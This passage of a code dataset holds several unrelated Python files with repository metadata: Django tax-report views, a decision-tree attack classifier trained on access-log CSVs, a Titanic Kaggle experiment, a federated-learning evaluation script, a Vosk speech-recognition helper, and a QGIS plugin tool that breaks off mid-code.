{\"tin\": person.tin, \"year\": \"2019\", \"lang\": \"uz\"})\n table = EmployeeListTable(employee)\n context = {\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/employee_list.html', context=context)\n\nclass BalancesList(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n balances = Balance.services.all('buxbalans', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n table = BalancesListTable(balances)\n context = {\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/balances_list.html', context=context)\n\nclass FinancesList(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n finances = Finance.services.all('finreport', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n table = FinancesListTable(finances)\n context = {\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/finances_list.html', context=context)\n\n\nclass ViewBaseNDS(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n base_nds = BaseNDS.services.get('nds', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n context = {\n 'person': person,\n 'object': base_nds\n }\n return render(request, 'taxservices/base_nds_info.html', context=context)\n\nclass ViewReportENP(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n report_enp = ReportENP.services.get('enp', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n context = {\n 'person': person,\n 'object': report_enp\n }\n return render(request, 'taxservices/report_enp_info.html', context=context)\n\n\n# PHYSICAL PERSON SERVICES\nclass SalariesList(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n salaries = Salary.services.all('fiz-salary', {\n \"tin\": person.tin, \"pinfl\": \"\", \"lang\": \"uz\",\n \"series_passport\": \"\", \"number_passport\": \"\"})\n table = SalaryTable(salaries)\n context = {\n 'title': 'Сведения о заработной плате',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass TaxDebtsList(View):\n def get(self, request, slug):\n if slug[0] == 'J':\n person = JuridicalPerson.objects.get(slug=slug)\n 
taxdebts = TaxDebt.services.all('yurdebt', {\"tin\": person.tin, \"lang\": \"uz\"})\n table = TaxDebtTable(taxdebts)\n context = {\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/taxdebts_list.html', context=context)\n else:\n person = PhysicalPerson.objects.get(slug=slug)\n taxdebts = TaxDebt.services.all('fizdebt', {\"tin\": person.tin, \"lang\": \"uz\"})\n table = TaxDebtTable(taxdebts)\n context = {\n 'title': 'Налоговая задолженность',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass FoundersList(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n founders = Founder.services.all('np3', {\"tin\": person.tin, \"lang\": \"uz\"})\n table = FounderTable(founders)\n context = {\n 'title': 'Юридическое лицо, в котором физическое лицо является учредителем',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass DividendList(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n dividend = Dividend.services.all('np3', {\"tin\": person.tin, \"year\": \"2019\", \"lang\": \"uz\"})\n table = DividendTable(dividend)\n context = {\n 'title': 'Сведения о полученных дивидендах',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass ObjectsList(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n objects = Object.services.all('fiz/tax-objects', {\"tin\": person.tin, \"lang\": \"uz\"})\n table = ObjectTable(objects)\n context = {\n 'title': 'Сведения об имуществе физического лица',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass LeasedsList(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n leaseds = Leased.services.all('rents', {\"tin\": person.tin, \"lang\": \"uz\"})\n table = LeasedTable(leaseds)\n context = {\n 'title': 'Сведения о сданной в аренду имущества',\n 'person': person,\n 'table': table\n }\n return render(request, 'taxservices/includes/list.physic.html', context=context)\n\n\nclass GenerateExcel(View):\n def get(self, request, slug):\n person = JuridicalPerson.objects.filter(slug=slug).first()\n\n # Налоговый задолженность\n taxdebts = TaxDebt.services.all('yurdebt', {\"tin\": person.tin, \"lang\": \"uz\"})\n mydict1 = []\n for item in taxdebts:\n mydict1.append({\n 'tax_name': item.get_tax_name(),\n 'ned_date': item.ned_date,\n 'ned_summa': item.ned_summa,\n 'pen_summa': item.pen_summa,\n })\n df_taxdebt = pd.DataFrame(mydict1)\n\n # Количество сотрудника\n employee = Employee.services.all('yur-employee-count', {\"tin\": person.tin, \"year\": \"2019\", \"lang\": \"uz\"})\n mydict = []\n for item in employee:\n mydict.append({\n 'fio': item.fio,\n 'tin': item.tin,\n 'doxod1': item.doxod1,\n 'doxod2': item.doxod2,\n })\n df_employee = pd.DataFrame(mydict)\n\n # Форма 1\n balances = Balance.services.dictall('buxbalans', {\n \"tin\": person.tin, \"year\": \"2019\",\n \"period\": \"4\", \"lang\": \"uz\"})\n df_right = pd.DataFrame(list(balances.values()))\n df_balance = read_frame(BalanceSheet.objects.all())[['code_str']]\n df_balance = df_balance.join(df_right.set_index('row_no'), on='code_str')\n\n # Форма 2\n finances = 
Finance.services.dictall('finreport', {\n \"tin\": person.tin, \"year\": \"2019\",\n \"period\": \"4\", \"lang\": \"uz\"})\n df_right = pd.DataFrame(list(finances.values()))\n df_finance = read_frame(FinanceReport.objects.all())[['code_str']]\n df_finance = df_finance.join(df_right.set_index('row_no'), on='code_str')\n\n # ЕНП\n report_enp = ReportENP.services.get('enp', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n base_nds = BaseNDS.services.get('nds', {\"tin\": person.tin, \"year\": \"2019\", \"period\": \"4\", \"lang\": \"uz\"})\n\n with BytesIO() as b:\n\n workbook = load_workbook('media/tmp_files/modul.xlsx')\n writer = pd.ExcelWriter(b, engine='openpyxl')\n writer.book = workbook\n writer.sheets = dict((ws.title, ws) for ws in workbook.worksheets)\n\n df_taxdebt.to_excel(writer, sheet_name='Налоговая задолженность', startrow=2, startcol=0, header=False, index=False)\n df_employee.to_excel(writer, sheet_name='Количество работников', startrow=2, startcol=0, header=False, index=False)\n\n df_balance.to_excel(writer, sheet_name='Форма № 1', startrow=3, startcol=1, header=False, index=False)\n df_finance.to_excel(writer, sheet_name='Форма № 2', startrow=4, startcol=1, header=False, index=False)\n\n if report_enp:\n sheet = workbook[\"ЕНП\"]\n sheet['B2'].value = report_enp.enp101\n sheet['B3'].value = report_enp.enp102\n sheet['B4'].value = report_enp.prib10\n\n if base_nds:\n sheet = workbook[\"НДС\"]\n sheet['B2'].value = base_nds.nds\n sheet['B3'].value = base_nds.ndsupr\n\n writer.save()\n response = HttpResponse(b.getvalue(), content_type='application/vnd.ms-excel')\n response[\"Content-Disposition\"] = 'attachment; filename=\"tax_report.xlsx\"'\n return response\n\nclass GenerateWord(View):\n def get(self, request, slug):\n person = PhysicalPerson.objects.filter(slug=slug).first()\n salaries = Salary.services.all('fiz-salary', {\n \"tin\": person.tin, \"pinfl\": \"\", \"lang\": \"uz\",\n \"series_passport\": \"\", \"number_passport\": \"\"})\n taxdebts = TaxDebt.services.all('fizdebt', {\"tin\": person.tin, \"lang\": \"uz\"})\n founders = Founder.services.all('np3', {\"tin\": person.tin, \"lang\": \"uz\"})\n dividend = Dividend.services.all('np3', {\"tin\": person.tin, \"year\": \"2019\", \"lang\": \"uz\"})\n objects = Object.services.all('fiz/tax-objects', {\"tin\": person.tin, \"lang\": \"uz\"})\n leaseds = Leased.services.all('rents', {\"tin\": person.tin, \"lang\": \"uz\"})\n\n doc = DocxTemplate(\"media/tmp_files/report.docx\")\n context = {\n 'person': person,\n 'salaries': salaries,\n 'taxdebts': taxdebts,\n 'founders': founders,\n 'dividend': dividend,\n 'objects': objects,\n 'leaseds': leaseds\n }\n\n doc.render(context)\n\n byte_io = BytesIO()\n doc.save(byte_io)\n byte_io.seek(0)\n\n response = HttpResponse(byte_io.read())\n\n # Content-Disposition header makes a file downloadable\n response[\"Content-Disposition\"] = \"attachment; filename=generated_doc.docx\"\n\n # Set the appropriate Content-Type for docx file\n response[\"Content-Type\"] = \"application/vnd.openxmlformats-officedocument.wordprocessingml.document\"\n\n return response\n","repo_name":"norboyev1990/RiskAssessment","sub_path":"taxservices/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25448568416","text":"#python decision-tree-classifier.py -t ./labeled-data-samples/access.csv -v ./labeled-data-samples/access.2020-04-28.csv\n\nfrom 
utilities import *\n\nargs = get_args()\ntraning_data = args['traning_data']\ntesting_data = args['testing_data']\n\n# Get training features and labeles\ntraining_features, traning_labels = get_data_details(traning_data)\n\n# Get testing features and labels\ntesting_features, testing_labels = get_data_details(testing_data)\n\n# DECISON TREE CLASSIFIER\nprint(\"\\n\\n=-=-=-=-=-=-=- Decision Tree Classifier -=-=-=-=-=-=-=-\\n\")\n\n# Instanciate the classifier\nattack_classifier = tree.DecisionTreeClassifier()\n\n# Train the classifier\nattack_classifier = attack_classifier.fit(training_features, traning_labels)\n\n# Get predections for the testing data\npredictions = attack_classifier.predict(testing_features)\n\nprint(\"The precision of the Decision Tree Classifier is: \" + str(get_occuracy(testing_labels,predictions, 1)) + \"%\")\n","repo_name":"guptaadi123/MLSEC","sub_path":"decision-tree-classifier.py","file_name":"decision-tree-classifier.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"12019846307","text":"try:\n import matplotlib\n import sys\n\n matplotlib.use('TkAgg' if 'darwin' in sys.platform else 'Agg')\n import matplotlib.pyplot as plt\nexcept Exception as ex:\n print(ex)\n print(\"Matplotlib unavailable\")\n\nimport pandas as pd\n\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.svm import SVR\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\nfrom hallucinate import Experiment, EstimatorConfig, Features, Kaggle\n\n\nclass Transforms(object):\n @staticmethod\n def extract_cabin(df):\n return df['Cabin'].apply(lambda x: x[0])\n\n @staticmethod\n def extract_ticket(df):\n def ret_ticket(ticket):\n ticket = ticket.replace('.', '')\n ticket = ticket.replace('/', '')\n ticket = ticket.split()\n ticket = map(lambda t: t.strip(), ticket)\n ticket = [a for a in filter(lambda t: not t.isdigit(), ticket)]\n if len(ticket) > 0:\n return ticket[0]\n else:\n return 'XXX'\n\n return df['Ticket'].apply(ret_ticket)\n\n @staticmethod\n def extract_title(df):\n return df['Name'].apply(lambda x: x.split('.')[0]).apply(lambda x: x.split(' ')[-1])\n\n @staticmethod\n def extract_surname(df):\n def do_it(a):\n return a[0].split(',')[0] if a[1] > 1 else 'UNK'\n\n return df[['Name', 'FamilySize']].apply(do_it, axis=1)\n\n @staticmethod\n def predict_age(df):\n feats = ['Pclass', 'Sex', 'FareC', 'Ticket', 'Title']\n fs = Features(feats,\n target='Age',\n train_data=pd.DataFrame(df[~df['Age'].isnull()].copy()),\n test_data=pd.DataFrame(df[df['Age'].isnull()].copy()))\n fs.transform(['Pclass', 'Ticket', 'Title'], 'onehot')\n X_train = fs.preprocess().values\n y_train = df[~df['Age'].isnull()]['Age'].values\n regressor = SVR(kernel='rbf')\n regressor.fit(X_train, y_train)\n X_pred = fs.preprocess(for_test=True).values\n y_pred = regressor.predict(X_pred)\n df.ix[df['Age'].isnull(), 'Age'] = y_pred.astype(int)\n return df['Age']\n\n\ndef build_all_experiment(name, train_df, test_df, cv_shuffle):\n exp = Experiment(name=name, cv=30, cv_shuffle=cv_shuffle, sc='accuracy', parallel=True)\n\n bare_feature_names = ['Pclass', 'Sex', 'Fare', 'SibSp', 'Parch', 'Cabin', 'Embarked', 'Title',\n 'Ticket']\n hallucinated_feature_names = ['Fare^2', 'AgeFareRatio', 'FarePerPerson', 'FamilySize', 'Single',\n 'SmallFamily', 'LargeFamily', 'AgeFareRatio^2', 'FareD', 'FareD2',\n 'FarePerPerson^2', 
'Surname', 'AgeD']\n\n bare_features = exp.make_features(bare_feature_names, name='Bare Features', train_data=train_df,\n test_data=test_df, target='Survived')\n\n hallucinated_features = exp.make_features(hallucinated_feature_names,\n name='Hallucinated', train_data=train_df,\n test_data=test_df, parent=bare_features,\n target='Survived')\n\n bare_features.set_feature_selector(\n SelectFromModel(DecisionTreeClassifier(random_state=7, max_depth=12), threshold=0.0005))\n hallucinated_features.set_feature_selector(\n SelectFromModel(DecisionTreeClassifier(random_state=7, max_depth=12), threshold=0.0005))\n\n bare_features.transform(['Pclass'], 'onehot')\n bare_features.transform(['Sex'], 'map', mapping={'male': 0, 'female': 1})\n bare_features.transform(['Fare'], 'fillna', strategy='mean')\n\n bare_features.transform(['Cabin'], 'fillna', strategy='value', value='XXX')\n bare_features.transform(['Cabin'], 'method', method_handle=Transforms.extract_cabin)\n bare_features.transform(['Cabin'], 'onehot')\n\n bare_features.transform(['Embarked'], 'fillna', strategy='value', value='S')\n bare_features.transform(['Embarked'], 'onehot')\n\n bare_features.transform(['Title'], 'method', from_=['Name'],\n method_handle=Transforms.extract_title)\n bare_features.transform(['Title'], 'onehot')\n\n bare_features.transform(['Ticket'], 'method', from_=['Ticket'],\n method_handle=Transforms.extract_ticket)\n bare_features.transform(['Ticket'], 'onehot')\n\n hallucinated_features.transform(['Fare'], 'fillna', strategy='mean')\n hallucinated_features.transform(['FareD'], 'discretize', from_=['Fare'],\n values_range=[-0.1, 10, 30])\n hallucinated_features.transform(['FareD'], 'onehot')\n\n hallucinated_features.transform(['FareD2'], 'discretize', from_=['Fare'], q=20)\n hallucinated_features.transform(['FareD2'], 'onehot')\n\n hallucinated_features.transform(['Fare^2'], '*', from_=['Fare, Fare'])\n\n # TODO this will look much better with an ExpressionTransform(expr='SibSp + Parch + 1')\n hallucinated_features.transform(['FamilySize'], '+', from_=['SibSp,Parch,1'])\n hallucinated_features.transform(['Single'], 'map', from_=['FamilySize'],\n mapping={1: 1, '_others': 0})\n hallucinated_features.transform(['SmallFamily'], 'map', from_=['FamilySize'],\n mapping={2: 1, 3: 1, 4: 1, '_others': 0})\n hallucinated_features.transform(['LargeFamily'], 'map', from_=['FamilySize'],\n mapping={1: 0, 2: 0, 3: 0, 4: 0, '_others': 1})\n\n hallucinated_features.transform(['FarePerPerson'], '/', from_=['Fare,FamilySize'])\n hallucinated_features.transform(['FarePerPerson^2'], '*', from_=['FarePerPerson,FarePerPerson'])\n\n # t1.transform(['Age'], 'method', method_handle=Transforms.predict_age)\n hallucinated_features.transform(['Age'], 'fillna', strategy='median')\n\n hallucinated_features.transform(['TmpFare'], 'fillna', from_=['Fare'], strategy='mean')\n hallucinated_features.transform(['TmpFare'], '+', from_=['TmpFare,0.1'])\n hallucinated_features.transform(['AgeFareRatio'], '/', from_=['Age,TmpFare'])\n hallucinated_features.transform(['AgeFareRatio^2'], '*', from_=['AgeFareRatio,AgeFareRatio'])\n\n hallucinated_features.transform(['AgeD'], 'discretize', from_=['Age'],\n values_range=[0, 6, 13, 19, 25, 35, 60])\n hallucinated_features.transform(['AgeD'], 'onehot')\n\n hallucinated_features.transform(['Surname'], 'method', from_=['Name,FamilySize'],\n method_handle=Transforms.extract_surname)\n hallucinated_features.transform(['Surname'], 'onehot')\n\n # t1.transform(['FareC', 'Fare^2', 'AgeFareRatio', 'FarePerPerson'], 
'log')\n # t1.transform(['FareC', 'Fare^2', 'AgeFareRatio', 'FarePerPerson'], 'std')\n\n exp.add_estimator(EstimatorConfig(LogisticRegression(n_jobs=1), {}, 'LRE'))\n\n return exp, bare_features\n\n\nif __name__ == '__main__':\n print()\n train_df = pd.read_csv('titanic/train.csv')\n train_df['Survived'] = train_df['Survived'].astype(int)\n test_df = pd.read_csv('titanic/test.csv')\n test_complete_df = pd.read_csv('titanic/test_complete.csv')\n test_complete_df['Survived'] = test_complete_df['Survived'].astype(int)\n\n cv_shuffle = False\n dtr_f_sel_thresholds = [0.0005 + a * 0.0005 for a in range(5)]\n # TODO logistic regression will hang in parallel mode if going <= 0.15 with the threshold\n # Only thing I can correlate with is the training set size. If big, it fucks up silently / hangs\n lr_f_sel_thresholds = [0.1 + a * 0.05 for a in range(5)]\n xgb_f_sel_thresholds = [0.0005 + a * 0.0005 for a in range(8)]\n lgb_f_sel_thresholds = [0.005 + a * 0.005 for a in range(5)]\n print(['{:g}'.format(a) for a in dtr_f_sel_thresholds])\n\n exp2, t2 = build_all_experiment('Kaggle', train_df, test_df, cv_shuffle=cv_shuffle)\n exp2.overview(verbose=0)\n exp2.grid_search_all(f_sel_thresholds=dtr_f_sel_thresholds)\n kaggle = Kaggle(exp2, 'PassengerId')\n submissions = kaggle.create_submissions()\n submissions = pd.concat([submissions, pd.read_csv('titanic/test_complete.csv')[['Survived']]],\n axis=1)\n print('Correlations with real values:\\n')\n print(submissions.corr()[submissions.corr()['Survived'] > 0.5]['Survived'].sort_values(\n ascending=False))\n print('\\nReal accuracies:\\n')\n accuracies = []\n for column in submissions.columns:\n accuracies.append((column, accuracy_score(submissions['Survived'], submissions[column])))\n accuracies = sorted(accuracies, key=lambda x: x[1], reverse=True)\n for acc in accuracies[:10]:\n print('{}: {:.4f}'.format(acc[0], acc[1]))\n exp2.plot_cv_runs()\n exp2.plot_f_sel_learning_curve()\n exp2.plot_feature_importance()\n exp2.plot_correlations()\n plt.show()\n","repo_name":"dvaida/hallucinate","sub_path":"example_usage.py","file_name":"example_usage.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73552114694","text":"import torch\nimport torch.nn.init\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nimport warnings\nimport pandas as pd\n\nfrom dataloader import testloader\nfrom model import CNN\n\nwarnings.filterwarnings(action='ignore')\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\nif device == 'cuda':\n torch.cuda.manual_seed_all(777)\n\nSTART_BLOCK_NUM = 1\nBLOCK_NUM = 30\n\nlabel_list = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n# label_list = ['Bag', 'Boot', 'Coat', 'Dress', 'Pullover', 'Sandal', 'Shirt', 'Sneaker', 'Top', 'Trouser'] # fashion-mnist\n\n\nnp.set_printoptions(precision=2)\n\ndef test_label_predictions(model, device, testloader):\n model.eval()\n actuals = []\n predictions = []\n with torch.no_grad():\n for data, target in testloader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n prediction = output.argmax(dim=1, keepdim=True)\n actuals.extend(target.view_as(prediction))\n predictions.extend(prediction)\n return [i.item() for i in actuals], [i.item() for i in predictions]\n\n\ndef plot_confusion_matrix(y_true, y_pred, classes, title=None, cmap=plt.cm.Blues):\n plt.figure(figsize=(50, 50))\n\n if not title:\n title = 
'Normalized confusion matrix'\n\n # Compute confusion matrix\n cm = confusion_matrix(y_true, y_pred)\n # Only use the labels that appear in the data\n # classes = classes[unique_labels(y_true, y_pred)]\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n fig, ax = plt.subplots()\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\n ax.figure.colorbar(im, ax=ax)\n # We want to show all ticks...\n ax.set(xticks=np.arange(cm.shape[1]),\n yticks=np.arange(cm.shape[0]),\n\n xticklabels=classes, yticklabels=classes,\n title=title,\n ylabel='True label',\n xlabel='Predicted label')\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n\n # Loop over data dimensions and create text annotations.\n fmt = '.2f'\n thresh = cm.max() / 2.\n for i in range(cm.shape[0]):\n for j in range(cm.shape[1]):\n ax.text(j, i, format(cm[i, j], fmt),\n ha=\"center\", va=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n fig.tight_layout()\n plt.savefig(\"./matrix/\"+title+\".png\")\n return ax\n\n\ndef class_accuracy(model):\n class_correct = list(0. for i in range(10))\n class_total = list(0. for i in range(10))\n\n with torch.no_grad():\n for data in testloader:\n images, labels = data\n outputs = model(images)\n _, predicted = torch.max(outputs, 1)\n c = (predicted == labels).squeeze()\n for i in range(4):\n label = labels[i]\n class_correct[label] += c[i].item()\n class_total[label] += 1\n\n for i in range(10):\n print('Accuracy of %3s : %2d %%' % (label_list[i], 100 * class_correct[i] / class_total[i]))\n\n\ndef create_eval_dataset(shard_name, block_num):\n shard_path = \"./experiment_data/shard1/\" + str(block_num) + \"/model/\" + shard_name + \".pt\"\n model = CNN().to(device)\n model.load_state_dict(torch.load(shard_path), strict=False)\n model.eval()\n actuals, predictions = test_label_predictions(model, device, testloader)\n\n if shard_name == \"aggregation\":\n plot_confusion_matrix(actuals, predictions, classes=label_list, title=\"Block\" + str(block_num) + \"_\" + shard_name)\n\n accuracy = accuracy_score(actuals, predictions) * 100\n # f1 = f1_score(actuals, predictions, average='weighted') * 100\n\n print(\"{0} : {1:.3f}\".format(shard_name, accuracy))\n \n if shard_name == \"aggregation\":\n print(\"-\" * 25)\n class_accuracy(model)\n print(\" \")\n return accuracy\n\n\nacc_dict = {}\n\nfor block in np.arange(START_BLOCK_NUM, BLOCK_NUM+1):\n print(\"<----------- Block Number: {0} ----------->\".format(block))\n s1_data = create_eval_dataset(\"shard1\", block)\n s2_data = create_eval_dataset(\"shard2\", block)\n s3_data = create_eval_dataset(\"shard3\", block)\n s4_data = create_eval_dataset(\"shard4\", block)\n s5_data = create_eval_dataset(\"shard5\", block)\n fedavg_data = create_eval_dataset(\"aggregation\", block)\n\n acc_dict[block] = s1_data, s2_data, s3_data, s4_data, s5_data, fedavg_data\n\ntuples = []\ns1_row_data = [\"shard1\"]\ns2_row_data = [\"shard2\"]\ns3_row_data = [\"shard3\"]\ns4_row_data = [\"shard4\"]\ns5_row_data = [\"shard5\"]\nfedavg_row_data = [\"FedAvg\"]\n\n\nfor block in np.arange(START_BLOCK_NUM, BLOCK_NUM+1):\n s1_row_data.append(acc_dict[block][0])\n s2_row_data.append(acc_dict[block][1])\n s3_row_data.append(acc_dict[block][2])\n s4_row_data.append(acc_dict[block][3])\n s5_row_data.append(acc_dict[block][4])\n fedavg_row_data.append(acc_dict[block][5])\n\ncolumn = [\"accuracy\"]\ncolumns = [\"shard\"]\n\nfor block in np.arange(START_BLOCK_NUM, 
BLOCK_NUM+1):\n columns.extend(column)\n\ntuples = [\n s1_row_data,\n s2_row_data,\n s3_row_data,\n s4_row_data,\n s5_row_data,\n fedavg_row_data\n]\n\ndf = pd.DataFrame(tuples, columns=columns)\ndf.to_excel(\"./acc_data/Block_data.xlsx\", index=False)\n","repo_name":"dongdalee/Blockchain_FL","sub_path":"utility/plot_confusion_matrix.py","file_name":"plot_confusion_matrix.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"3502136166","text":"from io import BytesIO\nimport vosk\nimport json\nfrom pydub import AudioSegment\nfrom os import path\n\nfrom container import parent_dir\n\nmodel_path = path.normpath(path.join(parent_dir, 'model', 'vosk-model-small-ru-0.22'))\nmodel = vosk.Model(model_path)\nsamplerate = 16000\n\n\ndef ogg_to_mp3_in_memory(ogg_data):\n try:\n # Преобразовываем данные OGG в BytesIO объект\n ogg_bytes = BytesIO(ogg_data)\n\n # Загружаем аудио из BytesIO\n audio = AudioSegment.from_file(ogg_bytes, format=\"ogg\")\n\n # Создаем BytesIO для хранения MP3 данных\n mp3_bytes = BytesIO()\n\n # Экспортируем аудио в формате MP3 в BytesIO\n audio.export(mp3_bytes, format=\"mp3\")\n\n # Получаем MP3 данные из BytesIO\n mp3_data = mp3_bytes.getvalue()\n\n return mp3_data\n except Exception as e:\n print(f\"Ошибка при конвертации: {str(e)}\")\n return None\n\n\ndef voice_message_recognition(voice_message_path):\n audio_segment = AudioSegment.from_file(voice_message_path, format='ogg',\n )\n\n # Конвертируем OGG данные в MP3 в памяти\n mp3_bytes = BytesIO()\n # Экспортируем аудио в формате MP3 в BytesIO\n audio_segment.export(mp3_bytes, format=\"mp3\")\n # Получаем MP3 данные из BytesIO\n mp3_data = mp3_bytes.getvalue()\n try:\n # Загружаем аудиофайл из MP3 данных\n audio = AudioSegment.from_mp3(BytesIO(mp3_data))\n except Exception as e:\n print(\"Ошибка загрузки аудиофайла:\", str(e))\n return\n\n # Преобразуем аудиофайл в WAV формат\n audio = audio.set_channels(1) # Преобразовываем в моно для Vosk\n audio = audio.set_frame_rate(samplerate)\n audio_data = audio.raw_data\n # Инициализируем KaldiRecognizer с моделью\n rec = vosk.KaldiRecognizer(model, samplerate)\n # Производим распознавание аудио\n rec.AcceptWaveform(audio_data)\n # Получаем результат в виде JSON\n result = json.loads(rec.Result())\n recognized_text = result[\"text\"]\n return recognized_text\n\n\ndef voice_to_text(voice_message_path):\n transcribed_text = voice_message_recognition(voice_message_path)\n if transcribed_text:\n print(\"Распознанный текст:\", transcribed_text)\n return transcribed_text\n\n\nif __name__ == '__main__':\n print()\n","repo_name":"Artemprod/aipo","sub_path":"speach_to_text.py","file_name":"speach_to_text.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4037653295","text":"\"\"\"\nThis file is part of Giswater 3\nThe program is free software: you can redistribute it and/or modify it under the terms of the GNU\nGeneral Public License as published by the Free Software Foundation, either version 3 of the License,\nor (at your option) any later version.\n\"\"\"\n# -*- coding: utf-8 -*-\nimport importlib\nimport sys\nimport os\nfrom enum import Enum\nfrom functools import partial\n\nfrom qgis.PyQt.QtCore import Qt\nfrom qgis.PyQt.QtGui import QColor\nfrom qgis.gui import QgsMapToolEmitPoint, QgsVertexMarker\n\nfrom ...ui.ui_manager import DlgButton2\nfrom ....settings import 
giswater_folder, tools_log, tools_qgis, tools_qt, tools_gw\ndialog = importlib.import_module('.dialog', package=f'{giswater_folder}.core.toolbars')\nsnap_manager = importlib.import_module('.snap_manager', package=f'{giswater_folder}.core.utils')\n\nclass SelectionType(Enum):\n ACTIVE = 0\n ALL = 1\n\n\n# TODO: comprobar si se cierra bien la map tool o no\n# TODO: comprobar si se restablece correctamente la configuracion de usuario\n# TODO: limpiar, ordenar y comentar codigo\n# TODO: mirate como funcionan los radiobuttons, hay mas formas\n\nclass MyButton2(dialog.GwAction):\n\n def __init__(self, icon_path, action_name, text, toolbar, action_group):\n\n super().__init__(icon_path, action_name, text, toolbar, action_group)\n self.vertex_marker = None\n self.emit_point = None\n\n\n def clicked_event(self):\n\n self.selection_type = SelectionType.ACTIVE\n self.dlg = DlgButton2()\n tools_gw.load_settings(self.dlg)\n\n # Secció: selecció de capes\n self.dlg.rdb_layers_active.clicked.connect(partial(self.selection_type_changed, SelectionType.ACTIVE))\n self.dlg.rdb_layers_all.clicked.connect(partial(self.selection_type_changed, SelectionType.ALL))\n\n # Secció: activar l'estat de \"seleccionant al mapa\"\n self.dlg.btn_select.clicked.connect(self.selection_start)\n self.dlg.btn_cancel.clicked.connect(self.deactivate_signals)\n self.dlg.btn_cancel.clicked.connect(lambda: self.dlg.rdb_layers_active.setEnabled(True))\n self.dlg.btn_cancel.clicked.connect(lambda: self.dlg.rdb_layers_all.setEnabled(True))\n # Secció: sortida\n self.dlg.btn_close.clicked.connect(self.dlg.close)\n self.dlg.rejected.connect(partial(tools_gw.save_settings, self.dlg))\n self.dlg.rejected.connect(partial(self.deactivate_signals))\n\n self.refresh_selection_type()\n\n tools_gw.open_dialog(self.dlg)\n\n\n def selection_type_changed(self, new_type):\n\n self.selection_type = SelectionType(new_type)\n self.refresh_selection_type()\n\n\n def refresh_selection_type(self):\n\n if self.selection_type == SelectionType.ACTIVE:\n self.dlg.chk_layer_arc.setEnabled(False)\n self.dlg.chk_layer_connec.setEnabled(False)\n self.dlg.chk_layer_node.setEnabled(False)\n else:\n self.dlg.chk_layer_arc.setEnabled(True)\n self.dlg.chk_layer_connec.setEnabled(True)\n self.dlg.chk_layer_node.setEnabled(True)\n\n\n def selection_start(self):\n\n self.is_selecting = True\n self.dlg.rdb_layers_active.setEnabled(False)\n self.dlg.rdb_layers_all.setEnabled(False)\n self.emit_point = QgsMapToolEmitPoint(self.canvas)\n self.canvas.setMapTool(self.emit_point)\n\n # Snapper\n self.snapper_manager = snap_manager.GwSnapManager(self.iface)\n self.snapper = self.snapper_manager.get_snapper()\n\n # Vertex marker\n self.vertex_marker = QgsVertexMarker(self.canvas)\n self.vertex_marker.setColor(QColor(255, 100, 255))\n self.vertex_marker.setIconSize(15)\n self.vertex_marker.setIconType(QgsVertexMarker.ICON_CROSS)\n self.vertex_marker.setPenWidth(3)\n\n # Store user snapping configuration\n self.previous_snapping = self.snapper_manager.get_snapping_options()\n\n if self.selection_type == SelectionType.ACTIVE:\n tools_log.log_info(\"single selector\")\n self.activate_snapping(self.emit_point)\n elif self.selection_type == SelectionType.ALL:\n tools_log.log_info(\"all selector\")\n # Store user snapping configuration\n if tools_qt.is_checked(self.dlg, self.dlg.chk_layer_arc) or \\\n tools_qt.is_checked(self.dlg, self.dlg.chk_layer_connec) or \\\n 